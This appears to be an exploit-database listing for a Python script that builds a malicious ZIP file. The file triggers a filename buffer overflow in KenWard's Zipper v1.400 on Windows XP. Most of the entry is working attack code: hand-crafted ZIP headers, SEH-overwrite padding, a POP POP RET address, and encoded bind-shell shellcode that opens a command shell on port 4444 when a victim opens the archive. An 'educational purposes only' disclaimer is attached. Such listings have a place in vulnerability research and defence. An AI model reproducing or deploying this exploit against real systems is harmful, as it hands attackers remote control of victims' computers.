KenWard's Zipper v1.400 Buffer Overflow - Method 2

2010-03-25T00:00:00
ID 1337DAY-ID-11436
Type zdt
Reporter sinn3r
Modified 2010-03-25T00:00:00

Description

Exploit for windows platform in category local exploits

                                        
                                            ==================================================
KenWard's Zipper v1.400 Buffer Overflow - Method 2
==================================================

#!/usr/bin/python
 
## KenWard's Zipper v1.400 File Name Buffer Overflow
## Coded by sinn3r  (x90.sinner{at}gmail{d0t}com)
## Tested on: Windows XP SP3 ENG
## Reference: http://www.exploit-db.com/exploits/11834
## Big thanks to mr_me, and corelanc0d3r.
## greetz to all the friends at Corelan Scurity Team & Exploit-DB... coolest people ever!
##
## Description:
## This exploit takes advantage of the fact too many characters get mangled, as a result
## I was able to get a shell in a more straight forward way.  Very interesting exercise.
## Mr_me and tecR0c figured out this trick, of course.  But I was given the honor to share it.
 
## Script provided 'as is', without any warranty.
## Use for educational purposes only.  Do not use this code to do anything illegal.
 
## Zip file format based on:
## http://en.wikipedia.org/wiki/ZIP_(file_format)
local_file_header = (
"\x50\x4B\x03\x04"  #Local file header signature
"\x00\x02"      #Version needed to extract
"\x00\x08"      #General purpose bit flag
"\x00\xDA"      #Compression method
"\xA2\x48"      #File last modification time
"\x3B\xF6"      #File last modification date
"\x66\x18\x0D\x4E"  #CRC-32
"\xEF\x0F\x00\x00"  #Compressed size (payload size)
"\x14\x00\x00\x00"  #Uncompressed size
"\xe4\x4f"      #File name length
"\x04\x00"      #Extra field length
#"\x73\x65\x63\x72\x65\x74\x73" #File name (n) ASCII "secrets"
#"\x42\x42\x42\x42" #Extra field (m)
);
 
central_directory_file_header = (
"\x50\x4b\x01\x02"  #Central directory file header signature
"\x14\x00"      #Version made by
"\x14\x00"      #Version needed to extract
"\x00\x08"      #General purpose bit flag
"\x00\xDA"      #Compression method
"\xA2\x48"      #File last modification time
"\x3B\xF6"      #File last modification date
"\x66\x18\x0D\x4E"  #CRC-32
"\xE4\x0F\x00\x00"  #Compressed size (payload size)
"\x14\x00\x00\x00"  #Uncompressed size
"\xe4\x0f"      #File name length (n)
"\x04\x00"      #Extra field length (m)
"\x04\x00"      #File comment length
"\x00\x01"      #Disk number where file starts
"\x00\x00"      #Internal file attributes
"\x20\x00\x00\x00"  #External file attributes
"\x00\x00\x00\x00"  #Relative offset of local file header
#"\x73\x65\x63\x72\x65\x74\x73" #File name (n) ASCII "secrets"
#"\x42\x42\x42\x42" #Extra field (m)
#"\x43\x43\x43\x43" #File comment (k)
);
 
end_of_central_directory_record = (
"\x50\x4B\x05\x06"  #End of central directory signature
"\x00\x00"      #Number of this disk
"\x00\x00"      #Disk where central directory starts
"\x01\x00"      #Number of central directory records on this disk
"\x01\x00"      #Total number of central directory records
"\x12\x10\x00\x00"  #Size of central directory (central directory size + payload)
"\x02\x10\x00\x00"  #Offset of start of central directory, relative to start of archive (lfh + payload)
"\x00\x00"      #Zip file comment length (n)
);
 
 
## Align EAX for the base address of the alpha2 encoded bindshell
alignEAX = (
"\x05\x10\x7E\x10\x7E"  #ADD EAX, 0x7E107E10
"\x05\x09\x75\x01\x7E"  #ADD EAX, 0x7E017509
"\x05\x02\x03\x01\x04"  #ADD EAX, 0x04010302
"\x72\x07"+     #JB jump over the bytes we can't overwrite
"\x41"*12       #NOPs
);
 
## windows/shell_bind_tcp lport=4444 exitfunc=seh
## alpha2 eax --uppercase   744 bytes
shellcode = ("PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIKLZHMYEP5PS03PK"
"9ZE6QN2CTLK0RVPLKPR4LLKQBTTLKSBVH4ONWQZVFFQKOFQO0NLGL3QSL4BVLQ0YQXO4MUQIWKRJPF2QGLKPRB0"
"LKPBGLEQ8PLK70RXMUO0BTQZEQHPPPLK78TXLK687PS1XSM37LPILKWDLKUQ8V6QKO6QYPNL9Q8OTMEQ9WFXKPT"
"5ZT33SMJX7KCM14CEZB1HLKPXWTUQN3SVLKTLPKLKV85LEQXSLK34LKS1HPK9W47TQ4QK1KSQQI0Z0QKOM0PXQO"
"QJLKTRJKK61MSXVS02EP5PCXBW3CFRQOF4SXPLT77VDGKO9EX8LPS1UPS0WYO4F4PP3X7YMP2KS0KOHUV00P0P6"
"0QPV01PPPRHJJTOIOKPKON5MYO7FQYK0SSXS2S0TQQLMYKVSZB0PVPW3XO2YK7GCWKO8UPSPWE8X7KYWHKOKOHU"
"QCV3PWSX2TJLGKKQKON5V7MYHG58BU2N0M3QKON52HRCBM54UPMYKS0W67676QL62JTRPYPVKRKMSVO774WTWLU"
"QUQLM0DGTB0O65PPD0TV0PV0V0VQVPVPNPV1FQC66SXT9XLWOLFKOYEK9M0PNV6QVKOFPCXUXK75MSPKON5OKKN"
"TNP2ZJBHY6LUOMMMKON5WLUV3L5ZK0KKKPRUC5OKW74S2R2ORJ5PPSKO8UUZA")
 
## 4064+4 bytes
## Pointer to next SEH record: 1022 bytes
## SE handler                : 1026 bytes
payload = (
"\x41"*(1017-len(alignEAX)-len(shellcode))+ #Padding
alignEAX+                   #Align EAX for the bindshell
shellcode+                  #Bindshell lport 4444
"\x82\x85\x81\x98\x98"              #This will get mangled and become "\xE9\xE0\xFC\xFF\xFF"
"\x73\x97\x42\x42"              #JNB 0x97 = JNB 0xF9 = Same as EB 0xFB = Rewind 5 bytes
"\x7E\x27\x41\x00"+             #POP POP RET = 0x0041277E
"\x44"*3034+                    #Padding
".bin"                      #Fake name
);
 
## Create the ZIP structure with our payload
zip = (
local_file_header +
payload +
central_directory_file_header +
payload +
end_of_central_directory_record
);
 
f = open("sploit.zip", "w")
f.write(zip)
f.close()
 
print "[*] Local file header size = 0x%x" %len(local_file_header)
print "[*] Central directory file header size = 0x%x" %len(central_directory_file_header)
print "[*] End of central directory record size = 0x%x" %len(end_of_central_directory_record)
print "[*] Payload size = %s bytes" %len(payload)
print "[*] sploit.zip created.  Open it with KenWard's Zipper."



#  0day.today [2018-01-02]  #